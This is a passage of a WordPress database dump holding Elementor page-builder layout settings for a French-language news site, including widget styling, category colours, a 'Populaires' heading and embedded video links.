af50\",\"category_bg_hover_color\":\"#4caf50\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom\":\"-10\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"},{\"id\":\"dghaq27\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"offset\":\"0\",\"category\":[\"1\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"56\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#266cc9\",\"category_bg_hover_color\":\"#266cc9\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"}],\"isInner\":true},{\"id\":\"6uc2i0p\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":\"44.078\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false},\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"fb4g874\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"2\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"78.5\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"400\",\"height\":\"510\",\"category_bg_color\":\"#c9975f\",\"category_bg_hover_color\":\"#c9975f\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":10,\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"_margin_mobile\":{\"unit\":\"px\",\"top\":\"17\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"}],\"isInner\":true},{\"id\":\"48mal4x\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":\"27.960\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"x20xpc5\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"5\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"45\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#ea7441\",\"category_bg_hover_color\":\"#ea7441\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom\":\"-10\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"},{\"id\":\"y4m8rgg\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"6\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"45\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#e5e100\",\"category_bg_hover_color\":\"#e5e100\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_color1\":\"rgba(255,255,255,0.5)\",\"post_icon_color2\":\"rgba(255,255,255,0.5)\",\"post_icon_size\":{\"unit\":\"px\",\"size\":\"15\"},\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding\":{\"unit\":\"px\",\"size\":\"15\"},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"c10cdqk\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"cnfm4uk\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"ofz40wf\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":17}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ghxiaw4\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"p0xcklh\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"tdxggq6\",\"elType\":\"widget\",\"settings\":{\"title\":\"Populaires\",\"header_size\":\"h3\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_line_height\":{\"unit\":\"em\",\"size\":2},\"_border_border\":\"double\",\"_border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"8e8e973\",\"elType\":\"widget\",\"settings\":{\"posts_per_page\":\"3\",\"vertical_position\":{\"unit\":\"%\",\"size\":15},\"horizontal_position\":{\"unit\":\"%\",\"size\":11},\"width\":\"600\",\"height\":\"300\",\"category_bg_color\":\"#357edd\",\"margin_bottom\":10},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"}],\"isInner\":false},{\"id\":\"h33oed1\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"z1s2m91\",\"elType\":\"widget\",\"settings\":{\"title\":\"Videos \",\"header_size\":\"h3\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_line_height\":{\"unit\":\"em\",\"size\":2},\"_border_border\":\"double\",\"_border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"tb167uj\",\"elType\":\"widget\",\"settings\":{\"link\":\"https:\\/\\/www.youtube.com\\/watch?v=0jeXbexRihs\",\"vimeo_link\":\"https:\\/\\/vimeo.com\\/235215203\"},\"elements\":[],\"widgetType\":\"video\"},{\"id\":\"4pok7wn\",\"elType\":\"widget\",\"settings\":{\"link\":\"https:\\/\\/www.youtube.com\\/watch?v=c_ixEg9Gszk&feature=youtu.be\",\"vimeo_link\":\"https:\\/\\/vimeo.com\\/235215203\"},\"elements\":[],\"widgetType\":\"video\"},{\"id\":\"m45qqz3\",\"elType\":\"widget\",\"settings\":{\"link\":\"https:\\/\\/www.youtube.com\\/watch?v=wQaejvxoQ2o\",\"vimeo_link\":\"https:\\/\\/vimeo.com\\/235215203\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false}],\"isInner\":false}]'),(1437,494,'_elementor_version','0.4'),(1438,494,'_elementor_css','a:3:{s:4:\"time\";i:1508921367;s:5:\"fonts\";a:1:{i:0;s:5:\"Arial\";}s:6:\"status\";s:4:\"file\";}'),(1440,495,'_elementor_edit_mode','builder'),(1441,495,'_elementor_data','[{\"id\":\"cgfdli8\",\"elType\":\"section\",\"settings\":{\"section_layout\":\"\",\"content_width\":{\"unit\":\"px\",\"size\":1170},\"gap\":\"no\",\"section_background\":\"\",\"background_overlay_section\":\"\",\"section_border\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"20\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_section_responsive\":\"\",\"heading_visibility\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"90zub0t\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"9wd6jr7\",\"elType\":\"section\",\"settings\":{\"section_layout\":\"\",\"layout\":\"full_width\",\"gap\":\"no\",\"structure\":\"30\",\"section_sticky_element\":\"\",\"section_background\":\"\",\"background_overlay_section\":\"\",\"section_border\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_typo\":\"\",\"section_advanced\":\"\",\"_section_responsive\":\"\",\"heading_visibility\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"so55224\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":\"27.961\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"gvq9sbs\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"3\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"45\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#4caf50\",\"category_bg_hover_color\":\"#4caf50\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom\":\"-10\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"},{\"id\":\"dghaq27\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"offset\":\"0\",\"category\":[\"1\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"56\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#266cc9\",\"category_bg_hover_color\":\"#266cc9\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"}],\"isInner\":true},{\"id\":\"6uc2i0p\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":\"44.078\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false},\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"fb4g874\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"2\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"78.5\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"400\",\"height\":\"510\",\"category_bg_color\":\"#c9975f\",\"category_bg_hover_color\":\"#c9975f\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":10,\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"_margin_mobile\":{\"unit\":\"px\",\"top\":\"17\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"}],\"isInner\":true},{\"id\":\"48mal4x\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":\"27.960\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"x20xpc5\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"5\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"45\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#ea7441\",\"category_bg_hov